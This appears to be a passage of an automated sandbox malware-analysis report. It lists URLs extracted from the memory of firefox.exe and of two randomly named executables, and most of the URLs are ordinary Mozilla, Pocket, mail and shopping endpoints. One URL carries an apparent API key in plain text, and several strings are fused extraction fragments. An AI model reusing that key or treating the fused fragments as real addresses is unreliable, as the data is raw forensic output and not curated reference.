                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmp, firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 0000001D.00000003.3364445219.00000214ADDB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/get
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
                          Source: firefox.exe, 0000001D.00000002.3377707348.000002149B511000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Should
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
                          Source: firefox.exe, 0000001D.00000002.3438362474.00000214AF718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submitdiscoverystream.isCollectionDismissibleDecision
                          Source: firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submits
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                          Source: firefox.exe, 0000001D.00000002.3443789097.00000214B3CE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3328071600.00000214B3CE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3335869944.00000214B3CE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema.
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema./
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
                          Source: firefox.exe, 0000001D.00000002.3399505695.00000214AADAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A896A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%Please
                          Source: firefox.exe, 0000001D.00000002.3404937712.00000214AB803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414473910.00000214AC883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 0000001D.00000002.3421733253.00000214ADB21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.comresource://normandy/lib/PrefUtils.sys.mjsresource://normandy/lib/Te
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3396815787.00000214A8B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sFailed
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3377707348.000002149B5DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest5
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/common/Actions.sys.mjsb
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3383883724.00000214A7AC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.comhttps://support.mozilla.orgmaybeShowOnboardingDialoghttps://screenshots.f
                          Source: firefox.exe, 0000001D.00000002.3449152388.00001317B2304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org/
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://mozilla.org/W
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ok.ru/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sresource://pdf.js/PdfJsDefaultPreferences.sys
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%shttps://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://profiler.firefox.com
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
                          Source: firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/Unexpected
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svgpictureinpicture%40mozilla.org:1.0.0
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://snippets.mozilla.com/show/
                          Source: firefox.exe, 0000001D.00000003.3340297144.00000214B3CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3438362474.00000214AF7C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3447537019.00000214B5D38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/os.windowsBuildNumber
                          Source: firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#l
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/userCouldn
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3332867628.00000214ACD45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3356098124.00000214ACD6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsQUERY_CONTENT_FLAG_SELECTION_IME_SELECTEDCONVERTEDT
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3356098124.00000214ACD6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelcolor-mix(in
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelhttps://static.adsafeprotected.com/firefox-etp-p
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3322309310.00000214ACB79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3322309310.00000214ACB79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
                          Source: firefox.exe, 0000001D.00000002.3423004266.00000214ADD7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                          Source: firefox.exe, 0000001D.00000002.3417855408.00000214ACC43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helptransitionState
                          Source: firefox.exe, 0000001D.00000002.3442726709.00000214B3C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
                          Source: firefox.exe, 0000001D.00000002.3442726709.00000214B3C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
                          Source: firefox.exe, 0000001D.00000002.3401422658.00000214AB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
                          Source: firefox.exe, 0000001D.00000002.3426975852.00000214AEC69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translationmigration-wizard-migrator-display-name-chromium-ed
                          Source: 176986cc9c.exe, 0000000F.00000003.3316379231.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: firefox.exe, 0000001D.00000002.3416090218.00000214ACA1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3399505695.00000214AAD50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                          Source: firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                          Source: firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                          Source: firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/Failed
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                          Source: d0d9725343.exe, 0000000B.00000003.3004420814.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2979921174.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3168094376.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3380329645.00000214A6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/main/anti-tracking-url-decorationscheduleCheckFor
                          Source: firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                          Source: firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
